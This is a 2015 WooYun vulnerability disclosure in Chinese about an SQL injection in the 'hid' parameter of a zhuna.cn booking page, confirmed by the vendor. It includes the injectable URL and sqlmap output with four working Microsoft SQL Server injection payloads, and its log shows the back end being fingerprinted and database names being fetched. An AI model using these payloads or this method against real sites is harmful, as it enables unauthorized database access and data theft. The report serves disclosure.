当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100054

漏洞标题:住哪网主站存在SQL注入漏洞

相关厂商:住哪网

漏洞作者: 疏懒

提交时间:2015-03-09 12:03

修复时间:2015-04-23 12:04

公开时间:2015-04-23 12:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-09: 细节已通知厂商并且等待厂商处理中
2015-03-09: 厂商已经确认,细节仅向厂商公开
2015-03-19: 细节向核心白帽子及相关领域专家公开
2015-03-29: 细节向普通白帽子公开
2015-04-08: 细节向实习白帽子公开
2015-04-23: 细节向公众公开

简要描述:

住哪网主站存在SQL注入漏洞

详细说明:

注入点

http://www.zhuna.cn/e/b2.php?hid=88952634&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10#47436f33-d5e2-4310-8d4a-9eec17a9e962


经检测,参数hid存在注入

漏洞证明:

sqlmap identified the following injection points with a total of 48 HTTP(s) requ
ests:
---
Place: GET
Parameter: hid
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (
original value)
    Payload: hid=(SELECT (CASE WHEN (4885=4885) THEN 88952634 ELSE 4885*(SELECT
4885 FROM master..sysdatabases) END))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2
=2015-3-10
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: hid=-9548 OR 3123=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(122) CHAR(12
0) CHAR(58) (SELECT (CASE WHEN (3123=3123) THEN CHAR(49) ELSE CHAR(48) END)) CHA
R(58) CHAR(108) CHAR(111) CHAR(100) CHAR(58)))&rid=88952634&pid=88952634&tm1=201
5-3-8&tm2=2015-3-10
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: hid=-3737 OR 2638=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers A
S sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysus
ers AS sys7)&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: hid=(SELECT CHAR(58) CHAR(120) CHAR(122) CHAR(120) CHAR(58) (SELECT
 (CASE WHEN (4578=4578) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(108) CHA
R(111) CHAR(100) CHAR(58))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10
---
[19:36:04] [INFO] testing Microsoft SQL Server
[19:36:04] [INFO] confirming Microsoft SQL Server
[19:36:05] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[19:36:05] [INFO] fetching database names


QQ截图20150307193950.png


修复方案:

你们专业

版权声明:转载请注明来源 疏懒@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-09 13:38

厂商回复:

非常感谢您反馈的信息,相关修复已交由技术处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-09 13:15 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    主站!

  2. 2015-04-24 11:42 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

    这链接怎么找的啊。。